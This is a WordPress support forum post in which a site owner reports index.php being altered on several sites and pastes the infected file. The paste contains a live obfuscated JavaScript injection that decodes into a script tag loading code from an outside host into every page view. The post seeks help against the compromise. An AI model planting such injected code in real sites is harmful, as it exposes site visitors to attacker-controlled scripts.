index.php getting hacked

  • websitemadeeasy

    (@websitemadeeasy)


    16 years, 2 months ago

    Hi,

    A few of my web sites keep getting hacked and having the index.php file hacked. We are running version 2.9.1 and this has happened on 3 different sites on 2 different servers. The file permissions are set to 644. Has anyone else encountered this?

    It gets changed to:

    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?<html><body><script type="text/javascript">
var sKeJXhbxZWtIl = "QouXM27QouXM35"; var cudxU3gDIzfWm0 = "QouXM3cQouXM73QouXM63QouXM72"; var cudxU3gDIzfWm1 = "QouXM69QouXM70QouXM74QouXM20"; var cudxU3gDIzfWm2 = "QouXM73QouXM72QouXM63QouXM3d"; var cudxU3gDIzfWm3 = "QouXM22QouXM68QouXM74QouXM74"; var cudxU3gDIzfWm4 = "QouXM70QouXM3aQouXM2fQouXM2f"; var cudxU3gDIzfWm5 = "QouXM61QouXM6cQouXM69QouXM76"; var cudxU3gDIzfWm6 = "QouXM65QouXM2eQouXM73QouXM65"; var cudxU3gDIzfWm7 = "QouXM72QouXM76QouXM65QouXM68"; var cudxU3gDIzfWm8 = "QouXM74QouXM74QouXM70QouXM2e"; var cudxU3gDIzfWm9 = "QouXM63QouXM6fQouXM6dQouXM2f"; var cudxU3gDIzfWm10 = "QouXM2fQouXM6dQouXM6cQouXM2e"; var cudxU3gDIzfWm11 = "QouXM70QouXM68QouXM70QouXM22"; var cudxU3gDIzfWm12 = "QouXM3eQouXM20QouXM3cQouXM2f"; var cudxU3gDIzfWm13 = "QouXM73QouXM63QouXM72QouXM69"; var cudxU3gDIzfWm14 = "QouXM70QouXM74QouXM3e"; var oerzcE5vou1oT = "UJcSD27QouXM35"; var K81QnhvnSDytg = cudxU3gDIzfWm0 + cudxU3gDIzfWm1 + cudxU3gDIzfWm2 + cudxU3gDIzfWm3 + cudxU3gDIzfWm4 + cudxU3gDIzfWm5 + cudxU3gDIzfWm6 + cudxU3gDIzfWm7 + cudxU3gDIzfWm8 + cudxU3gDIzfWm9 + cudxU3gDIzfWm10 + cudxU3gDIzfWm11 + cudxU3gDIzfWm12 + cudxU3gDIzfWm13 + cudxU3gDIzfWm14; var hvy5hPPMjw4Ku = "OEHW827gt7HD35"; apZ1XCvA0QDqd = K81QnhvnSDytg.replace(/QouXM/g,"%"); var pqJ3cq0cHxKCl=unescape;var sKeJXhbxZWtIl = "gt7HD27UJcSD35"; q9124=this; var BQjg7vVfw3srD= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; BQjg7vVfw3srD.write(pqJ3cq0cHxKCl(apZ1XCvA0QDqd));
</script></body></html>>

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)

The topic ‘index.php getting hacked’ is closed to new replies.